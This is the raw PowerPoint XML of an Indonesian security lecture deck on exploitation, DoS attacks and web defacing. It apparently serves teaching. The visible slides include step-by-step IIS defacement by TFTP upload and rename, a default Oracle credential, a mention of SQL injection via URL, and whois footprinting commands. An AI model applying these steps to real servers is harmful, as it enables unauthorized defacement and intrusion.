              <a:t>Jalankan TFTP di server S. Untuk komputer Windows (98/Me), ada program kecil dan gratis tftpd32.exe yang dapat digunakan untuk menjadi TFTP server. Jalankan program ini di komputer anda. Buat sebuah berkas "namaku.htm" yang akan dijadikan halaman baru yang akan di-upload ke server target.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Upload startpage dari TFTP server anda ke target T dengan menggunakan TFTP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Rename "namaku.htm" menjadi "default.htm" dengan menggunakan program RENAME di server. Lakukan dengan menggunakan URL khusus di atas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Cek tampilan di browser. Anda baru saja melakukan deface terhadap sebuah web server yang menggunakan IIS.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Merusak database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65539" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Banyak sistem yang masih menggunakan account default</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Oracle / change_on_install</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Serangan terhadap SQL server dengan memberikan perintah-perintah SQL yang tidak benar (via URL web)</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smtClean="0"/>
              <a:t>Tugas (cari dimana saja)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4000" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="4000" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66563" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Makalah server IIS </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Makalah server Apache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WordArt 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2667000" y="3124200"/>
            <a:ext cx="4419600" cy="9906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Unicode MS"/>
                <a:ea typeface="Arial Unicode MS"/>
                <a:cs typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>Terima kasih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7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Contoh tabel target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="45099" name="Group 43"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1981200"/>
          <a:ext cx="8229600" cy="2484438"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1644650"/>
                <a:gridCol w="1479550"/>
                <a:gridCol w="1069975"/>
                <a:gridCol w="1265238"/>
                <a:gridCol w="2770187"/>
              </a:tblGrid>
              <a:tr h="533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Nama</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-GB"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No IP</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Alive</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OS</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pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Services</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-GB"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7270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www.bank.com</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-GB" sz="1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10.10…</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-GB"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ya</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-GB"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Windows NT SP 6</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-GB"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http</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-GB"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270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xyz.</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-GB" sz="1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10.10.10.1</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-GB"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Ya</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-GB"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Windows 2000, SP3</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-GB"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NetBIOS, ftp, http (IIS)</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-GB"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mail.bank.com</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-GB" sz="16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pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>SMTP</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-GB" sz="1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685800" y="228600"/>
            <a:ext cx="7772400" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="92075" tIns="46038" rIns="92075" bIns="46038" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400"/>
              <a:t>whois</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11267" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="1219200"/>
            <a:ext cx="7772400" cy="4454525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="sq">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Unix% whois “acme.”@whois.crsnic.net</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Unix% whois “acme.net”@whois.crsnic.net</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Unix% whois acme.net@whois.networksolutions.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11268" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1524000" y="2857500"/>
            <a:ext cx="6477000" cy="37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685800" y="228600"/>
            <a:ext cx="7772400" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="92075" tIns="46038" rIns="92075" bIns="46038" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400"/>
              <a:t>Whois dengan Sam Spade</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>http://www.samspade.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12291" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="1447800"/>
            <a:ext cx="80010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297</TotalTime>
  <Words>1712</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>357</Paragraphs>
  <Slides>64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Pixel</vt:lpstr>
      <vt:lpstr>Document</vt:lpstr>
      <vt:lpstr>Eksploitasi Keamanan</vt:lpstr>
      <vt:lpstr>Tujuan </vt:lpstr>
      <vt:lpstr>Outline </vt:lpstr>
      <vt:lpstr>Cari Informasi Tentang Target</vt:lpstr>
      <vt:lpstr>Foot printing</vt:lpstr>
      <vt:lpstr>Data Domain Name System</vt:lpstr>
      <vt:lpstr>Contoh tabel target</vt:lpstr>
      <vt:lpstr>Slide 8</vt:lpstr>
      <vt:lpstr>Slide 9</vt:lpstr>
      <vt:lpstr>Program “nslookup”</vt:lpstr>
      <vt:lpstr>Program “host”</vt:lpstr>
      <vt:lpstr>Masih Tentang DNS</vt:lpstr>
      <vt:lpstr>Routing</vt:lpstr>
      <vt:lpstr>http://visualroute.visualware.com</vt:lpstr>
      <vt:lpstr>Server hidup?</vt:lpstr>
      <vt:lpstr>Masih tentang ping</vt:lpstr>
      <vt:lpstr>ICMP Query</vt:lpstr>
      <vt:lpstr>Jenis Scaning</vt:lpstr>
      <vt:lpstr>Deteksi Scanning</vt:lpstr>
      <vt:lpstr>Penangkal Scanning</vt:lpstr>
      <vt:lpstr>OS Fingerprinting</vt:lpstr>
      <vt:lpstr>Application fingerprinting</vt:lpstr>
      <vt:lpstr>Langkah selanjutnya….</vt:lpstr>
      <vt:lpstr>Initial Access </vt:lpstr>
      <vt:lpstr>Tujuan &amp; Cara</vt:lpstr>
      <vt:lpstr>Mencari tahu tentang user</vt:lpstr>
      <vt:lpstr>Mencoba masuk</vt:lpstr>
      <vt:lpstr>Menyadap dengan “ngrep”</vt:lpstr>
      <vt:lpstr>Menyadap dengan “dsniff”</vt:lpstr>
      <vt:lpstr>Penyadap lainnya</vt:lpstr>
      <vt:lpstr>Ethereal</vt:lpstr>
      <vt:lpstr>Ethereal screenshots</vt:lpstr>
      <vt:lpstr>Menangkap data dengan ethereal</vt:lpstr>
      <vt:lpstr>Slide 34</vt:lpstr>
      <vt:lpstr>Password Cracking</vt:lpstr>
      <vt:lpstr>Membuka password di windows</vt:lpstr>
      <vt:lpstr>Cain – membuka akses Windows</vt:lpstr>
      <vt:lpstr>Membajak DNS</vt:lpstr>
      <vt:lpstr>Proteksi</vt:lpstr>
      <vt:lpstr>DoS Attack </vt:lpstr>
      <vt:lpstr>Pengertian (DoS Attack)</vt:lpstr>
      <vt:lpstr>Sasaran serangan</vt:lpstr>
      <vt:lpstr>Network DoS (SYN) Attack</vt:lpstr>
      <vt:lpstr>Slide 44</vt:lpstr>
      <vt:lpstr>Land attack</vt:lpstr>
      <vt:lpstr>Latierra</vt:lpstr>
      <vt:lpstr>Ping flood attack</vt:lpstr>
      <vt:lpstr>Ping-o-death</vt:lpstr>
      <vt:lpstr>Ping broadcast (smurf)</vt:lpstr>
      <vt:lpstr>Pola smurf attack</vt:lpstr>
      <vt:lpstr>Serangan DoS ke Jaringan</vt:lpstr>
      <vt:lpstr>SYN Flooding</vt:lpstr>
      <vt:lpstr>Windows ICMP/SYN Flood</vt:lpstr>
      <vt:lpstr>Session HOG</vt:lpstr>
      <vt:lpstr>SNMP Attack</vt:lpstr>
      <vt:lpstr>Membuat paket palsu</vt:lpstr>
      <vt:lpstr>Serangan ke OS</vt:lpstr>
      <vt:lpstr>WEB Defacing</vt:lpstr>
      <vt:lpstr>WEB Defacing</vt:lpstr>
      <vt:lpstr>IIS Defacing</vt:lpstr>
      <vt:lpstr>IIS Defacing</vt:lpstr>
      <vt:lpstr>Merusak database</vt:lpstr>
      <vt:lpstr>Tugas (cari dimana saja) </vt:lpstr>
      <vt:lpstr>Slide 64</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Graha Teknologi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 – EKSPLOITASI (Denial of Service (DoS) Web Deface)</dc:title>
  <dc:creator>Indrawan</dc:creator>
  <cp:lastModifiedBy>dublut</cp:lastModifiedBy>
  <cp:revision>37</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2005-02-20T17:18:48Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-05-11T09:00:48Z</dcterms:modified>
</cp:coreProperties>
</file>